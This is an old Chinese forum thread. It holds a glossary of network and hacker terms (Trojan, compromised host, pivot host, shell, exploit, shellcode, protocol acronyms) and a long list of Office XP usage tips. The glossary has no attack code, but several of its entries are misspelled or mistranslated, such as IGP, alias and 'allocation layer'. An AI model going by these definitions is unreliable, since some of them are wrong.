77 12345678
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:21   |  只看该作者   |  转账至  82622206

网络技术术语

网络技术术语

木马
全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出现在希腊神话传说中。相传在3000年前,在一次希腊战争中。麦尼劳斯派兵讨伐特洛伊王国,但久攻不下。他们想出一个主意,首先他们假装被打败然后留下一个大木马,。而木马里面却藏着最强悍的勇士!最后等时间一到木马里的勇士冲出来把敌人打败了。这就是后来的“木马计”,而黑客中的木马有点后门的意思,就是把预谋的功能隐藏在公开的功能里,掩饰真正的企图。
肉鸡
已经被攻击了,对其具有控制权的主机。

跳板
一个具有辅助作用的机器,利用这个主机作为一个间接的工具,来入侵其他的主机,一般和肉鸡连用。

shell
shell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个shell。(Win2K是cmd.exe)

root
Unix里最高权限的用户,也就是超级管理员。

admin
windows NT,2K,XP里最高权限的用户,也就是超级管理员。

rootshell
通过一个溢出程序,在主机溢出一个具有root权限的shell。

exploit
溢出程序。exploit里通常包含一些shellcode。

shellcode
溢出攻击要调用的API函数,溢出后要有一个交换式界面进行*作。所以说就有了
shellcode。

Access Control List(ACL)
访问控制列表

access token
访问令牌

account lockout
帐号封锁

account policies
记帐策略

accounts
帐号

adapter
适配器

adaptive speed leveling
自适应速率等级调整

Address Resolution Protocol(ARP)
地址解析协议

Administrator account
管理员帐号

ARPANET
阿帕网(internet的前身)

algorithm
算法

alias
别名

allocation
分配、定位

alias
小应用程序

allocation layer
应用层

API
应用程序编程接口

anlpasswd
一种与Passwd+相似的代理密码检查器

applications
应用程序

ATM
异步传递模式

attack
攻击

audio policy
审记策略

auditing
审记、监察

back-end
后端

borde
边界

borde gateway
边界网关

breakabie
可破密的

breach
攻破、违反

cipher
密码

ciphertext
密文

CAlass A domain
A类域

CAlass B domain
B类域

CAlass C domain
C类域
classless addressing
无类地址分配

cleartext
明文

CSNW Netware
客户服务

client
客户,客户机

client/server
客户机/服务器

code
代码

COM port COM口
(通信端口)

CIX
服务提供者

computer name
计算机名

crack
闯入

cryptanalysis
密码分析

DLC
数据链路控制

decryption
解密

database
数据库

dafault route
缺省路由

dafault share
缺省共享

denial of service
拒绝服务

dictionary attack
字典式攻击

directory
目录

directory replication
目录复制

domain


domain controller
域名控制器

domain name域名
域名其实就是入网计算机的名字,它的作用就象寄信需要写明人们的名字、地址一样重
要。域名结构如下:计算机主机名.机构名.网络名.最高层域名。域名用文字表达,比
用数字表达的IP地址容易记忆。加入Internet的各级网络依照DNS的命名规则对本网内
的计算机命名,并负责完成通讯时域名到IP地址的转换 。

DNS 域名服务器
DNS(Domain Name System,域名系统)是指在 Internet上查询域名或IP地址的目录服务系
统。在接收到请求时,它可将另一台主机的域名翻译为IP地址,或反之。大部分域名系
统都维护着一个大型的数据库,它描述了域名与 IP地址的对应关系,并且这个数据库被
定期地更新。翻译请求通常来自网络上的另一台计算机,它需要IP地址以便进行路由选择。

DDE
动态数据交换

DHCP
动态主机配置协议

encryption
加密

EGP
外部网关协议

FDDI
光纤分布式数据接口

FAT
文件分配表

FTP(File Transfer Protocol)
文件传送协议

filter
过滤器

firmware
固件

flooding
淹没

GSNW NetWare
网关服务
GDI(graphical device interface)
图形设备界面

GUI
图形用户界面

HTML
超文本标记语言

HTTP
超文本传送协议

IGP
内部安全性

ICMP(Internet Control Message Protocol)
网际控制报文协议
ICMP用来发送关于IP数据报传输的控制和错误信息的TCP/IP协议。当一个IP数据报不能传送
到目的地时,可能是因为目的地的机器暂停服务或者信息交通阻塞,路由器可能使用ICMP将
失败信息通知发送者。
IGMP(Internet Group Management Protocol,Internet群组管理协议)
这种TCP/IP协议允许Internet主机参加多点播送(multicasting)----一种向计算机群广播
信息的有效手段

IIS
信息服务器

IP(Internet Protocol)
网际协议

IRC
网上交谈

ISP
网络服务提供者

IPX
互连网分组协议

IPC
进程间通信

IRQ
中断请求

IP address IP地址
IP地址称作网络协议地址,是分配给主机的一个32位地址,由4个字节组成,分为动
态IP地址和静态IP地址两种。动态IP地址指的是每次连线所取得的地址不同,而静
态IP地址是指每次连线均为同样固定的地址。一般情况下,以电话拨号所取得的地址
均为动态的,也就是每次所取得的地址不同。

IP masquerade
IP伪装

IP spoofing
IP欺骗

LAN
局域网

LPC
局部过程调用

NNTP
网络新闻传送协议

PPP 点到点协议
称为点对点通信协议(Point to Point Protocol),是为适应那些不能在网络线上的使
用者,通过电话线的连接而彼此通信所制定的协议。

PDC
主域控制器

Telnet
远程登陆

TCP/IP 传输控制协议/网际协议
TCP/IP通信协议主要包含了在Internet上网络通信细节的标准,以及一组网络互连的协
议和路径选择算法。TCP是传输控制协议,相当于物品装箱单,保证数据在传输过程中不
会丢失。IP是网间协议,相当于收发货人的地址和姓名,保证数据到达指定的地点。

TFTP 普通文件传送协议
TFTP是无盘计算机用来传输信息的一种简化的FTP协议。它非常之简单,所以可固化在硬
盘上,而且支持无认证*作。TFTP是一种非常不安全的协议。

Trojan Horse
特洛伊木马

URL
统一资源定位器

UDP
用户数据报协议

VDM
虚拟DOS机

UUCP
是一种基于猫的使用已经很久的文件传输协议,有时候还使用它在Internet上传输
Usenet新闻和E-mail,尤其是在那些间断性联网的站点上。现在很少站提供匿名的UUCP来
存取文件。而它做为一种文件传输协议,只有那些没有入网而使用猫的用户使用此方法。

WWW 万维网
WWW(Word Wide Web)是Internet最新的一种信息服务。它是一种基于超文本文件的
交互式浏览检索工具。用户可用WWW在Internet网上浏览、传递、编辑超文本格式的文件。

WAN
广域网

virtual server
虚拟服务器

Usenet
用户交流网Usenet是网络新闻服务器的主要信息来源。Usenet完全是一个民间自发建立
的,使用Internet交换信息但又不完全依赖Internet进行通讯的用户交流网络。使用
Usenet的自愿者共同遵守一些约定的网络使用规则。

USER name
用户名

USER account
用户帐号

Web page
网页

OpenGL
开放图形语言

ODBC
开放数据库连接

PCI
外设连接接口

[ 本帖最后由 82622206 于 2005-12-5 15:20 编辑 ]
鱼溺水而亡,是为了让大海能够记住他~
31楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:42   |  只看该作者   |  转账至  82622206

OFFICE XP 的80种技能

1.快速定位——书签  

姓名:胡天福
江苏省南京市

在需要定位的位置,选取“插入”菜单中的“书签”命令,打开书签对话框;在其中,设置好书签名后,按“添加”即可;
在同样的对话框中,选择一个书签,单击定位即可。
专家点评:
知道书签功能的用户不在少数,不过使用书签的人却为数不多,也许是我们的文档多不够大吧?实际上书签除了定位功能外还有很多作用,如很多和书签有关的Word域;文档内的超级链接以及文档目录

2.使用自定义序列排序

姓名:任永涛
河北保定

使用自定义序列排序 在Excel排序对话框中选择主要关键字后单击选项,可以选择自定义序列作为排序次序,使排序方便快捷且更易于控制。顺便说一下,排序可以选择按列或按行,我以前如果排行的顺序都是选择性粘贴转置,排完序后再转置
专家点评:
自定义排序只应用于“主要关键字”框中的特定列。在“次要关键字”框中无法使用自定义排序次序。若要用自定义排序次序对多个数据列排序,则可以逐列进行排序。例如,如果要根据列A或 列B进行排序,可先根据列B排序,然后通过“排序选项”对话框确定自定义排序次序。下一步就是根据列 A 排序。

3.在PowerPoint中巧妙插入新幻灯片

姓名:饶大骞
新疆维吾尔族自治区哈密市

在编辑PowerPoint时,不时的要插入一张新幻灯片,采用点击“插入”-“新幻灯片…”-“请选取自动版式”-“确定”,的确过于繁琐,有捷径吗?有。如果想在当前幻灯片的后面插入一张新幻灯片,试一试“Shift+Enter(回车键)”,奇妙吧!当然了“Ctrl+M”也可以。不信?你试试看.  

专家点评:
在格式工具栏中有一个新幻灯片按钮,也是一个快速插入新幻灯片的方法;如果偏爱快捷键,则建议使用“Ctrl+M”。“Shift+Enter(回车键)”在不同的视图和状态下会有不同的作用,仅在幻灯片缩略图窗格中选定一张幻灯片的情况下,才能起到插入一张新幻灯片的作用。

4.平均Word文档的分栏

姓名:王耀威
辽宁省大连市

我们在对Word文档进行分栏的过程,往往会遇到最后一页的栏是不等长的,其实,你只要将定位插入点到文档末尾,然后选择“插入|分隔符”命令,在弹出的对话框中选择“连续”单选按钮,然后“确定”,这时候最后一页的栏也变成等长的了。
专家点评:
本方法将在分栏内容的最后插入一个连续型分节符。我通常的作法是,先在内容后面插入一个空行,但分栏时不选中此空行。与上述方法是异曲同工。如果仅对文档中间的一部分分栏,则直接分栏即可,不必这么麻烦。

5.更快速的“全部保存”

姓名:王宇星
浙江省温州市

有文章介绍过,在Word 2000中想保存多篇打开的文档,可以按住Shift键,选择“文件”菜单中的“全部保存”即可;其实有更快速的方法:可以按住Shift键,然后鼠标单击常用工具栏上的“保存”按钮,这时“保存”按钮的图标就变成“全部保存”的图标,松开鼠标,即保存完毕。
专家点评:
这是我盼望已久的一个技巧。实际上这种方法在Excel中更多,例如在按下Shift时单击打开按钮则可以实现保存的功能,反之亦然。读者可以这样来试验,先按下Shift,再单击一个按钮不要松开鼠标按钮,观察按钮的图形是否改变为其它,然后移开鼠标即可。

6.如何群发邮件

姓名:徐雯
上海市

在OUTLOOK“联系人”中选定所需收件人,从“工具”菜单中选择“邮件合并”命令。在对话框中选择适当的选项后单击确定。
在出现的WORD文档中输入邮件内容,从“邮件合并”工具栏中选择“合并到电子邮件”,再按“确定”。OUTLOOK就会把您所想要发的文档发送出去了。
专家点评:
邮件合并功能最早是为发送批量的普通邮件设计的。现在也可以批量发送电子邮件。也许您会质疑:电子邮件的收件人、抄送和密件抄送可以有多项,何必批量发送?实际上,我一开始也是这么认为的,直到有人开发了一个发送工资条的系统,我才意识到:微软不做没用的事

7.Word 表格计算

姓名:凌世碧
四川省成都市

在Word 2000的表格中,可以进行比较简单的四则运算和函数运算。其使用方法是:将插入点定位在记录结果的单元格中,然后打开“表格”下拉菜单中的 “公式”命令,出现对话框后,在等号后面输入运算公式或“粘贴函数”。计算公式可引用单元格,表格中的列可用A、B、C…等表示,行数用1、2、3…表示  
专家点评:
Word表格的计算功能虽然无法和Excel相比,但却远远超出一般人对于“简单”的想象。除了四则运算、乘方、百分数和等式不等式外,另有求和、取整等18个函数可供选用,如果定义了书签,还可以引用书签进行计算。

8.Word斜线表头

姓名:杞郧
四川省成都市

将插入点定位在单元格中。然后执行“表格”菜单中的“绘制斜线表头”命令,当出现对话框后,选择“表头样式”(共有5种可选择),分别填入“行标题”(右上角的项目)、“列标题”(左下角的项目)和“数据标题”(中间格的项目)以及“字体大小”等,最后按确定退出。删除斜线表头的方法是,单击要删除的斜线表头,当周围出现选定标记时,按[Del]键即可删除该斜线表头。
专家点评:
最简单的表格只有行列2维。在手工处理数据的年代,为了能够在一张表格中反映尽可能多的信息,人们使用了斜线表头等结构复杂的表格。但数据库管理系统出现之后,我们只使用结构最简单的表,原来的复杂结构则通过表之间的关系来表达。因此,一般说来,斜线表头会导致表格结构复杂而不利于自动处理。

10.快速重复输入

姓名:蒋剑虎
广东省深圳市

在WORD中当输完一些内容后,同时按下ALT与ENTER键则刚才输入的内容会被自动拷贝一遍,并且适用于拷贝粘贴后的重复粘贴。
专家点评:
其实这个快捷键对应的就是编辑菜单中的“重复”命令。不过这个命令有3个快捷键,大家熟悉的是屏幕提示的Ctrl+Y,也有人用功能键F4;本技巧给出的则是它的第3个快捷键。

11.送你一个外出“小秘书”

姓名:林志雄
福建省莆田市

在Outlook 单击“工具”菜单中的“外出时的助理程序”项。在对话框中点选“我目前外出”选项后,点下方的“添加规则”。在“编辑规则”对话框中设置规则。如:选择执行下列*作中的“答复”选项,编辑模板(点模板按钮)并保存,然后确定所有项目。这样,以后你外出的话如果有人给你写信,你可通过次助理程序来自动答复他们,告诉他们如有要事如何与你联系。
专家点评:
此功能属于Outlook服务器端的邮件规则,需要Exchanger Sever的支持。否则可能根本无法找到该菜单命令。

12.Outlook时间的自然语言支持

姓名: 李彦智
北京市丰台区

在Outlook的约会、任务和会议要求等窗体中,都有时间/日期等,一般情况下我们直接输入日期或者选择日期。其实还有一种高级用法:只要输入表示日期的词语就可以获得对应的日期。这些表示日期/时间的词语主要有:1-表示日期的常见词,如:现在、Today、今天、明(昨)天、前天、大前天、大后天等,中英文均可;2-数字:代表当月的日期,注意不要超过 31,数字或中英文大小写均可;3-节假日:如国庆节,元旦,建军节、 圣诞节等;4-星期:如星期五、礼拜一等;5-表示日期的复杂短语,如今天+20天、7.1+10day, 2 days later等.

专家点评:
这是一种人性化设计,在计划若干天后的工作时,因无需掐算,该方法比从日历中选择日期更为方便。

13.改变文字方向

姓名:雍琦
浙江省嘉兴市

只要把字体设成“@字体”,如“@宋体”就可以令文字逆时针旋转90度了。这种方法对于设置与正文同方向的页眉页脚是非常有用
专家点评:
如果通过“文字方向”命令修改文字的方向,则会自动添加一个“下一页”类型的分节符。而本方法则可以将不同方向的文字在同一段落中显示。

14.字符与Unicode代码的互换

姓名:谭佳杰
上海市杨浦区

首先,输入一个需转换的字符。接着,将光标移至它的右边。最后,按下组合键:Alt+X。此时,Unicode字符便展现在你眼前;反之,若需将 Unicode代码转换为字符时,和上边*作一样。先输一组Unicode字符,还是将光标移至它的右边,按下组合键:Alt+X
专家点评:
记住某些特殊字符的Unicode代码是有用的,一般也可以在插入符号的对话框找到。而查阅Unicode代码,则很难找到更简单的方法了。

15.在Excel中输入人名时使用“分散对齐”

姓名:杨晓青
北京市

在Excel表格中输入人名时为了美观,我们一般要在两个字的人名中间空出一个字的间距。按空格键是一个办法,但是我们这里有更好的:我们以一列为例,将名单输好后,选中该列,点击“格式—单元格—对齐”,在“水平对齐”中选择“分散对齐”,最后将列宽调整到最合适的宽度,整齐美观的名单就做好了。
专家点评:
本技巧给出了一个很好的例子,同时还带出了一个原则:永远不应使用空格或空行来调整对象的位置,因为它很难控制,且适应性差,可能导致意想不到的结果。在本例中,如果名字中间有空格,查找时若忘了这个空格则会很麻烦

16.快速选定Excel区域

姓名:吴马长
大连市沙河口区

在Excel中,要想在工作簿中快速选定某块区域,只需单击想选定的区域的左上角单元格,同时按住Shift键不放,再单击想选定的区域的右下角单元格即可。另:按住Ctrl键再用鼠标可任意选定多个不相邻的区域。

专家点评:
事实上选定区域和顺序无关,只需首先选定矩形区域的一个角的单元格,再按下Shift的同时单击对角单元格。此2种选定方法同样适用于Word 2002,但Word 2002以前的版本不支持选定多个不连续区域。

17.插入水印

姓名:陈宁华
上海市浦东区

要想在Word 2000的文档中添加自己喜欢的“水印”,只要双击“格式”菜单,选择“背景”命令,再选择“水印”,出现关于“水印”的设置拦,你可以在“文字”栏里写入自己喜欢的文字(公司名称等)即可。一般在“颜色”栏里选择“灰色”。

专家点评:
Word老用户还记得在6.0中插入水印的方法吗?对了,在页眉页脚视图中通过图文框插入!到了2002,则不仅可以通过本技巧中的方法插入文字水印,更可以直接选择图片插入水印。现在的Office用户真幸福啊!

18.Excel自带的示例文件

姓名:仲飞
广西壮族自治区柳州市

在:\ProgramFiles\Microsoft Office\Office10\Samples 文件夹中有两个EXCEL示例文件 SAMPLES:主要包含工作表函数,条件格式,数据有效性,图标标志,重复任务,数组,API示例,事件,自动化,ADO等演示数据,对学习Excel 使用很有帮助SOLVSAMP:是用来学习加载宏"规划求解"的一个示例文件,当中包含6个方面的应用:产品组合、货物传送、排班组合、最大收益、投资方案和电路设计.

专家点评:
无论您是初学者,还是熟练用户,这两个文件都会对您有很大的帮助。注意:要使用规划求解,需要先加载规划求解加载宏。方法是从工具菜单中选择加载宏命令,在对话框中选中规划求解即可。

19.找回丢失的Word文件

姓名:姚晓亮
甘肃省兰州市

单击“打开”按钮,选“文件类型”框中的“所有文件”选项。在文件夹列表中,双击含有打开备份文件的文件夹。单击“视图”按钮。在“名称”栏中,文件名显示为“XX备份”,在“类型”框中,文件的类型显示为“microsoft word备份文件档”。找到该文件并双击。则打开该文件。(要找会丢失文件的前提是,必须在word中设置成“保留备份”,并且文件已经保留了备份。)

专家点评:
启用保留备份的方法是从工具菜单的选项命令,在保存选项卡中,选中保留备份。此后每次保存文档时,都以备份副本的形式复制文档的前一版。每个新的备份副本会替换前一备份副本。Word 会将备份副本(以 .WBK 为文件扩展名)与原文档保存在同一个文件夹中。如果选中“保留备份”复选框,Word 将自动清除“允许快速保存”复选框,因为 Word 只能在执行完整保存时创建备份副本。

20.Excel 2000中选定超级链接文本技巧
姓名:周进
湖南省宁远县

如果需要在Excel 2000中选定超级链接文本而不跳转到目标处,可采用如下*作方法,单击包含超级链接文本的单元格,按住鼠标左键至少一秒钟,然后释放鼠标,这时就可以选定超级链接文本。

专家点评:
在Excel 2002中,当指向该单元格时,除了会提示链接地址外,也会提示单击一次可跟踪链接;单击并按住可用于选定单元格。不过在Word中,默认需要Ctrl+单击来跟踪链接;而PowerPoint中,则是在播放时单击才能跟踪链接。

21.给Outlook个人文件夹( .pst文件)加把锁

姓名:赵李华
上海市浦东新区

在“文件”菜单上,单击“数据文件管理”。 单击需要的 .pst 文件,再单击“设置”。 单击“更改密码”并在框中输入旧密码和新密码。一般最初密码为空。 单击“确定”。

专家点评:
Outlook个人文件夹包含了在Outlook中可以查看的所有信息,或者是这些信息的备份。因此,加密管理是一个好方法,不过千万不要忘记密码,否则就再也无法打开它了。

22.制作有颜色的公式

姓名:刘舫
北京市海淀区

使用office自带的公式编辑器制作出的公式都是黑色的,使用通常的办法无法改变公式的颜色,不过可以使用给公式添加阴影的方法,改变公式的颜色。在公式编辑器中做好一个公式,回到编辑状态,通过"视图"-"工具栏"-"绘图",调出"绘图工具栏",单击"绘图工具栏"中的"阴影设置"按钮,选择其中的 "阴影样式17"或者"阴影样式18",为公式做一个阴影,再点选"阴影设置"按钮中的"阴影设置"选项,弹出"阴影设置"工具栏,调整阴影的位置,使阴影与公式重合,再通过设置阴影颜色,从而改变公式的颜色。

专家点评:
其实在Word或Excel中通常并不需要改变公式编辑器对象的颜色,因为默认情况下,就是白底黑字。但在PowerPoint中的情况就不同了,在深色背景的情况,公式可能几乎无法看清。虽然这可能不是所谓“正式”的功能,但它确实解决问题。

23.活用WORD的特殊字符替换功能

姓名:林志雄
福建省莆田市

点“编辑”下“替换”,选择“高级”。在“查找内容”和“替换为”中使用“特殊字符”可以实现许多你意想不到的功能。比如,网上常有一些文本不到一段就换行或者两行间还有个空行。用手工删除整篇文章中无用的换行符十分麻烦。使用替换功能,在查找内容中输入两次“段落标记”,在替换为中输入一个“段落标记” 进行替换。数千个没用的空行瞬间清理就完毕了。使用该高级替换功能还可实现许多特殊的编辑功能。大家自己去尝试吧!

专家点评:
此技巧有一定的限制,而且不一定可以一步清除所有多余的空行。因此如果使用Word 2002,可以把粘贴的智能标记和本技巧结合使用。

24.最大化和还原窗口的技巧

姓名:张维山
山西省太谷市

除了正常的按右上角的最大化和还原按钮,调整窗口之外,我发现了还有两个地方可以完成同样的调整。你也许会说,第一种是双击标题栏,可以在最大化和还原之间变化,我说对,这就是第一种方法。那么第二种呢,我先问你有办法吗?我告你吧,在水平和垂直的滚动条的交叉处双击鼠标键,还不要说真的在最大化和还原之间变化。举一反三吧,这样的技巧要不都让我发现了。

专家点评:
也许您认为这属于Windows的技巧而不是Office的技巧。其实准确地说,它是Word的技巧。因为我还没有找到别的那个程序支持这个*作的功能。很难得哦!

25.获得邮件传递结果通知

姓名:赵李华
上海市浦东新区

对所有邮件都设置送达或阅读通知
在“工具”菜单上,单击“选项”。
单击“电子邮件选项”。
单击“跟踪选项”。
选中“已读回执”或“送达回执”复选框。

26.对单个邮件获得通知
在邮件中,单击“选项”。
在“投票和跟踪选项”之下,选中“请在送达此邮件后给出‘送达’回执”或“请在阅读此邮件后给出‘已读’回执”复选框。

专家点评:
由于历史的原因,普通的电子邮件甚至Internet不被认为是可靠的通信方式。但作为一种重要的甚至是主要的通信方式,回执功能可能会带来很大的方便。虽然由于接收方或回执丢失的原因,没有收到回执并不意味着对方没有收到邮件;但如果收到回执,则可以肯定对方收到了邮件。

27.使用PowerPoint制作相册

姓名:刘剑
四川省德阳市

启动PowerPoint新建一个幻灯文件,执行插入菜单内图片子项下的新建相册命令打开相册对话框,在该对话框中选择要放入本相册的图片,并在完成图片调整及相册版式的设置后单击创建按钮关闭对话框回到幻灯编辑模式,编辑相册封面,继续完成幻灯动画、切换、背景、声音等设置,最后保存文档,您就可以和您的朋友一起慢慢欣赏自己制造的精美相册了。

专家点评:
相册是PowerPoint 2002的新增功能,尽管不通过此功能也可以制作相册。但该功能可以更快捷、更自动化地完成工作。

28.使用Word汉英互译

姓名:张冲
北京市海淀区

中文版Word中支持英汉、汉英互译,方法是将光标定位在要翻译的词,或者选中目标词汇,然后按下Alt+Shift+F7即可出现一个对话框,其中有翻译后的词汇。

专家点评:
这个功能从Word 6.0就已经有了,到了Word 2002则发展到极致。还可以借助Internet进行9国语言的全文互译。

29.如何消除缩位后的计算误差

姓名:甘为民
上海市徐汇区

有时我们输入的数字是小数点后两位数,但是在精度要求上只要一位,缩位后显示没问题,但其计算结果却是有误差的。解决方法是“工具-选项-重新计算”中,勾选“以显示值为准”。这样计算结果就没有误差了。

专家点评:
事实上并不是计算上有误差,而是显示设置的四舍五入。采用本技巧提供的方法,可以解决显示中的问题,但同时会改变数值的精度,在使用前Excel会给您一个警告。

30.在Outlook中实现快速邮件检索

姓名:严振亚
天津市河西区

在使用Outlook时经常要对符合某些条件的邮件进行检索,但如果每次都重新设置搜索条件*作起来比较麻烦,可以按照下面的方法实现快速检索邮件。启动 Outlook后选择“工具”——“高级查找”——在高级查找对话框中填入您的具体检索条件——单击“文件”——“保存搜索条件”——选择路径并填入文件名——单击“确定”,设置完成。今后您可以在不需要启动Outlook的情况下直接双击刚才保存的检索文件,程序会自动搜索出您需要的邮件,非常方便。

专家点评:
搜索人人都会,有人多次使用相同的条件进行搜索,似乎并未觉得有多麻烦。试试这个技巧吧,就算您的工作不忙,早点作完休息一会也好。

31.使用Outlook过滤电子邮件

姓名:严振亚
天津市河西区

如果您不想收到某人的电子邮件可以在Outlook中这样*作:工具——规则向导——新建——邮件到达时检查(下一步)——发件人电子邮件地址中包含特定词语——单击特定词语填入要阻止的email地址(下一步)——将其永久删除(单击两次下一步)——选中“立即对已在收件箱中的邮件上运行此规则”和“启用此规则”(完成)。这样设置后就再也不会接收到某人的邮件了。

专家点评:
邮件规则可以非常灵活地管理您的电子邮件,各种条件和*作的组合数以十万计。如果收到了不想看到的邮件,可以利用“组织”中的“垃圾邮件”功能快速创建处理规则。

32.快捷键之快捷键

姓名:张明
山东省青岛市

同时按下Ctrl+Alt+“+”(数字键盘上的加号键),这时鼠标符号会变成一个奇怪的形状。 将这个鼠标符号移动到菜单上或工具栏上,左键单击您想指定的菜单命令或工具栏上的命令按钮便会自动弹出“自定义键盘”对话框,将光标放到“请按新快捷键”输入框中,按想要新建的快捷键。按下新的快捷键以后,输入框中会显示您的快捷键组合。在“当前快捷方式”文本框里选中要删除的快捷方式,单击“删除”可以去除不需要的快捷键。

专家点评:
也就是几天以前,我在MSDN上看到了美国微软一位美眉写的关于覆盖Word内置功能的文章,其中提到了这个技巧。我可以告诉各位那个奇怪的形状有多奇怪: 。输入2318后再按下Alt+x可以得到它。高手越来越多,我若不抓紧时间卖弄一下,怕是就没机会了。

33.Office使用技巧:快速选择Excel工作表

姓名:杨国秋
深圳市龙岗区

在Excel中,要在一个有很多个工作表的工作簿中快速的选择某一个工作表,只需将鼠标指针移到工作薄左下角的工作表滚动轴(Sheet Tabs),然后点击右键,在快捷菜单中选择你想要的工作表。

专家点评:
我们的注意力常常集中在如何在同一个工作表中定位。这个技巧对于Excel老手也许颇有帮助,一般人看来,他们的工作簿通常有太多的表。

34.让FLASH影片在POWERPOINT中酷闪

姓名:王祥明
浙江省平湖市

右击工具栏,在弹出菜单中单击“控件工具箱”,再单击右下角的“其他控件”,在弹出菜单中选择“Shockwave Flash Object”,然后用鼠标(此时成十字形)在页面上拉出一长方形(该长方形大小即FLASH影片大小,可调整),在选中该长方形的情况下单击控件工具箱左上角的属性按钮,在弹出的属性对话框中找到Movie一项,在其后的空格中输入FLASH影片的路径和完整文件名(也可为URL路径),单击放映后即可在POWERPOINT 中放映FLASH影片。

专家点评:
看着题目就够酷的了,您要真照着做一个幻灯片出来那就更酷了。不只是PowerPoint可以酷闪,Word和Excel同样可以酷一把,方法吗…酷似!

35.如何将数据库直接转换为word表格?

姓名:吴海东
福建省福州市

视图---〉工具栏---〉数据库---〉调用数据库快捷工具栏后单击插入数据库按钮---〉选择数据源---〉浏览找到所需要插入的数据库(表),当然首先确定使插入access数据库还是vfp、dbase等类型数据表---〉选择所需要插入的字段---〉确定---〉调整。

专家点评:
Word可以导入数据库,没想到吧?岂止可以导入,还可以动态刷新。可以处理字段和记录,活脱脱一个小DBMS。

36.通过双击格式刷可以重复复制格式

姓名:陈琦
河南省郑州市

多数word使用者知道:选中一部分文字时,按下格式刷可以取出所在位置或所选内容的文字格式,用这一个刷子去刷别的文字可实现文字格式的复制。但每次刷完后,格式刷就变成不可用。如果希望重复复制格式,就要不停地重复上述过程。有一个技巧可避免上述的繁琐步骤:通过双击格式刷,可以将选定格式复制到多个位置。若要关闭格式刷,按下ESC键或再次单击格式刷即可。

专家点评:
这是一个很好的技巧,类似的还有绘制自选图形时,也可以双击以绘制多个。任何时候,如果您觉得使用Office有些不方便,也许您就要发现一个新的技巧了。

37.定义印刷样式的页眉

姓名:任永涛
河北省保定市

印刷制品的页眉经常是章节标题加页数,十分漂亮,其实word也可以达到这个功能
1、插入页码:位置--页眉,对齐方式--外侧
2、分别在奇数页页眉和偶数页页眉插入域代码:styleREF "标题 1" (其中"标题 1"为你想使用的样式名称)
3、通过制表位调节显示位置使其美观
4、根据章节划分应用样式后,页眉自动显示相应的标题
如果你有双面打印机,那打印出的成品将和印刷品一样。
马上去试一下吧

专家点评:
不知是作者疏忽还是笔误,我知道可以分别在奇数页引用“标题1”,而在偶数页引用“标题2”;换言之,正面引用章标题,背面引用节标题,这样岂不更像一本书,而且是绝对精美的书?

38.隐藏单元格中的所有值

姓名:李红阁
河南省濮阳市

有时候,我们需要将单元格中所有值隐藏起来,这时你可以选择包含要隐藏值的单元格。选择“格式”菜单中“单元格”命令,单击“数字”选项卡,在“分类”列表中选择“自定义”,然后将“类型”框中已有的代码删除,键入“;;;”(三个分号)即可。

专家点评:
您也许奇怪为什么会这样,其实单元格数字的自定义格式是由正数、负数、零和文本4个部分组成。这4个部分用3个分号分隔,那个部分空,相应的内容就不会在单元格中显示。现在都空了,当然就都不显示了。不过这只是一步,要真得让别人看不到,还需要做些工作,等着您来告诉我们吧。

39.Excel小技巧

姓名:李红阁
河南省濮阳市

Excel 2002新增了一项“文本到语音”功能,利用这项功能我们可以让Excel工作表开口说话,并可以在输入数据时实现语音校对,大大方便了我们的输入校对工作。单击“工具”菜单下的“语音”,然后选择“文本到语音”命令,打开“文本到语音”之后,会出现“文本到语音”的任务面板,共有五个控制按钮,从左到右依次是“朗读单元格”、“停止朗读”、“按行”、“按列”和“安回车键开始朗读”。如果你输入了大量的数据信息后发现某一个数据可能输错了,如果是以前你可能要拿着原稿,对着屏幕一一检查,现在好了,你可以选定要检查的数据范围,然后点击“文本到语音”任务面板的“朗读”按钮,然后看着你的原稿,听着Excel的朗读就行了。既然我们的输入有时难免出错,为什么不在输入时仔细校对呢?选择“文本到语音”任务面板的“按下回车键开始朗读”按钮,然后开始输入,你在按回车键结束对一个单元格的输入时,Excel会接着读出的你刚才所输入的内容,这下可好了,我们眼睛着着原稿,双手不停地输入,耳朵听着刚才输入的内容,从而充分调动眼、手、耳等器官功能,实现高速输入。

专家点评:
我们常说:“差之毫厘,谬以千里”;可是如果是在Excel中,不查毫厘,也可能谬以千里。为什么会这样?原来只差了个“0”。
言归正传,Excel中数据的正确性无疑是非常重要的,这项“文本到语音”的功能,可不是为了做秀。

40.添加纸牌游戏

姓名:李红阁
河南省濮阳市

使用Excel时间长了,感觉有点累了,让我们休息一下,来玩一盘纸牌游戏吧。选择“工具”菜单下的“自定义”命令,打开“自定义”窗口,点击“命令”标签卡,在“类别”中选择“工具”,从“命令”中找到有纸牌形状且为“自定义”名称的图标将其拖到常用工具栏中,关闭自定义窗口,然后点击上具栏上纸牌按钮就可开始玩纸牌游戏了。

专家点评:
我推荐了这条技巧,不知会不会入选。有个软件业的大人物曾经说过:希望他的软件能够让工作成为乐趣。也许暂时还做不到这一点,不过乐趣就在软件中,由这个技巧您已经看到了。如果我再告诉您,Excel 2000中有一个3D飞车游戏您会不会以为这是在说胡话?我已经玩过这个飞车游戏了,信不信由您。

41.巧妙设定Word启动后的默认文件夹

姓名:王湘蔚
吉林省通化市

Word2000启动后,使用“打开”命令打开文件时,Word使用的默认文件夹通常是“我的文档”文件夹。实际上很多时候需要打开的文件都存放在自己事先设定好的文件夹中,怎样才能让 Word自己识别自己的文件夹呢?你可以按照如下步骤设置Word启动后的默认文件夹:
(1)用鼠标 单击菜单栏中的“工具”菜单项,并从下拉菜单中单击“选项”命令,程序将会弹出一个标题为“选项”的对 话框;
(2)在该对话框中,选择“文件位置”标签,同时选择“文档”;
(3)单击“ 更改”按钮,打开“更改位置”对话框,在“查找范围”下拉框中选择文件夹所在的盘符。光标指向您希望将 其设置为默认文件夹的Word文档文件夹并单击,在“文件夹名称”中即显示出该文件夹;
